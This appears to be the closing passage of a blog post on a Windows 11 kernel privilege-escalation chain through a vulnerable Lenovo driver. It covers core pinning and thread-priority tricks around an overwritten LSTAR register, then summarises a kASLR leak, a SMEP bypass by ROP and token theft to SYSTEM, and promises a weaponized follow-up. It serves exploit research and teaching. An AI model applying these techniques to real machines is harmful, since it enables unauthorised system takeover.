There is not one global LSTAR register for the whole computer; every logical core has its own. When the vulnerable driver executes the wrmsr instruction, it only overwrites LSTAR on the core it happens to be running on at that moment.

Setting the affinity mask to 1 (the bitmask 00000001, representing Core 0) forces both the program and the resulting driver execution to stay on Core 0.
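The mask is a plain bitfield with one bit per logical processor. As a small sketch (affinity_mask_for_cpu is a hypothetical helper, and it assumes a single processor group of at most 64 logical processors), the value passed to the affinity calls is derived like this:

```c
#include <stdint.h>

/* Bit n of an affinity mask selects logical processor n.
 * Valid for cpu in 0..63, i.e. within one processor group. */
static uint64_t affinity_mask_for_cpu(unsigned cpu)
{
    return 1ULL << cpu;
}
```

Core 0 gives 0x1, the value used above; core 3 would give 0x8. Any single-bit mask works for this purpose, as long as the same core is used for the MSR write and the syscall that follows.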

SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

The second step, raising our process to maximum priority, is there to prevent a catastrophic system crash caused by a context switch.

Once LSTAR is overwritten on Core 0, Core 0 is effectively a “poisoned” core. The next time any process running on Core 0 executes syscall, the CPU will jump to the swapgs ; iretq gadget.

The exploit relies on the PrepareStack MASM function setting up the registers and stack exactly right before executing syscall. But Windows is a highly concurrent OS. Thousands of background threads are executing system calls every second.

By setting the priority to REALTIME_PRIORITY_CLASS and THREAD_PRIORITY_TIME_CRITICAL, we are telling the Windows scheduler: “Do not interrupt this thread for anything. Give me 100% of this CPU core’s attention until I say otherwise.” This minimizes the window for another process to steal the CPU and step on the poisoned LSTAR mine.

Conclusion

Starting from a vulnerable Lenovo driver with no access control, this post walked through a complete Ring 0 code execution chain on Windows 11 24H2:

kASLR defeated: one IOCTL call to read LSTAR, one subtraction to recover the kernel base.
Physical memory brute-force abandoned: without a reliable virtual-to-physical translation the scan crashes the target; MSR primitives are more reliable.
SMAP found pre-bypassed: AC=1 survives the syscall transition by default; no explicit bypass needed.
SMEP defeated via ROP: kernel gadgets clear CR4 bits 20 and 21 before our shellcode executes.
Privilege escalation complete: token theft via ActiveProcessLinks walk promotes our process to NT AUTHORITY\SYSTEM.

We now have the most privileged token on the system and have successfully proven our Ring 0 execution primitive. It feels great, but let’s be honest with ourselves: our exploit is currently a glass cannon.

Right now, we are relying heavily on hardcoded kernel offsets, static RVA values to bypass kASLR, and a machine-specific CR4 state. If you take this exact executable and run it on a coworker’s laptop, or even just install a minor Windows update on your own machine, the offsets will shift and the target system will instantly Blue Screen.

In Part 2, we will transform this fragile Proof of Concept into a fully weaponized, portable exploit. We will throw away the hardcoded addresses and build a 100% dynamic chain. We will engineer a user-mode PE scanner to locate our ROP gadgets on the fly, construct a Ring 0 payload to leak the machine’s native CR4 register, and implement dynamic shellcode patching to navigate the ever-changing _EPROCESS structures across different Windows 10 and 11 builds.

> Next: engineering-a-fully-dynamic-exploit
